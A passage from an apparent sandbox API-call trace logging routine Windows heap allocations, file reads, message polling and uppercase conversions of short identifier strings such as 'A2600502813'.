(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0211.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0211.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0211.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0211.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0211.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0211.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0211.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0211.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0211.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0211.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0211.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0211.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0211.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0211.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0211.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0211.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0211.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0211.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0211.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0211.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0211.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50ea020 [0211.808] SetFilePointerEx (in: hFile=0x4f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0211.808] ReadFile (in: hFile=0x4f4, lpBuffer=0x3854008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3854008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0211.811] ReadFile (in: hFile=0x4f4, lpBuffer=0x3854008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3854008*, lpNumberOfBytesRead=0x8cf4f8*=0x10e2, lpOverlapped=0x0) returned 1 [0211.811] ReadFile (in: hFile=0x4f4, lpBuffer=0x3854008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3854008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0211.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0211.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0211.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0211.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0211.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x110e2) returned 0x2a8a938 [0211.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50ea020 | out: hHeap=0x2af0000) returned 1 [0211.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0211.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0211.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0211.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0211.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0211.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0211.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0211.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x110e2) returned 0x2aae878 [0211.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a938 | out: hHeap=0x2af0000) returned 1 [0211.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0211.817] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0211.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0211.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0211.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0211.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0211.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x110e2) returned 0x2a8a938 [0211.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0211.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a938 | out: hHeap=0x2af0000) returned 1 [0211.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0211.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0211.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0211.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0211.818] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0211.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0211.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0211.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0211.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0211.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0211.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0211.818] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0211.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0211.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0211.818] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0211.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0211.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0211.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0211.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719e8 [0211.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0211.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0211.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0211.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0211.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x110e2) returned 0x2a8a938 [0211.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a48 [0211.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0211.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0211.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0211.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b98 [0211.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0211.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0211.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ab8 [0211.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0211.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0211.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0211.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5a0 [0211.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0211.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0211.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0211.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0211.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0211.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x110e2) returned 0x2abf968 [0211.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0211.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0211.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0211.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0211.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0211.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0211.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0211.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0211.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0211.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0211.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0211.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0211.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0211.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0211.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0211.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0211.821] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0211.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0211.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0211.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0211.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0211.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0211.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0211.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0211.821] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0211.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0211.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0211.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0211.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0211.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0211.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0211.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0211.822] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0211.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0211.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0211.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0211.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0211.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0211.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0211.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0211.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0211.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0211.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0211.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0211.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0211.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0211.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0211.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0211.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0211.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0211.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0211.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0211.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0211.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0211.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0211.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0211.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c08 [0211.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0211.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0211.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0211.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0211.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0211.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0211.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0211.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0211.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0211.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0211.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0211.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0211.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0211.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0211.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0211.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0211.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0211.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0211.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0211.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0211.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0211.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0211.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0211.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0211.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0211.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0211.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0211.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0211.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0211.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0211.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0211.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0211.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0211.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0211.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0211.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0211.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0211.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0211.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0211.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0211.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0211.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0211.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0211.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0211.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0211.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0211.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0211.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0211.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0211.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0211.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0211.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0211.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0211.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0211.826] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0211.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0211.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0211.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa840 [0211.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0211.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0211.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0211.826] 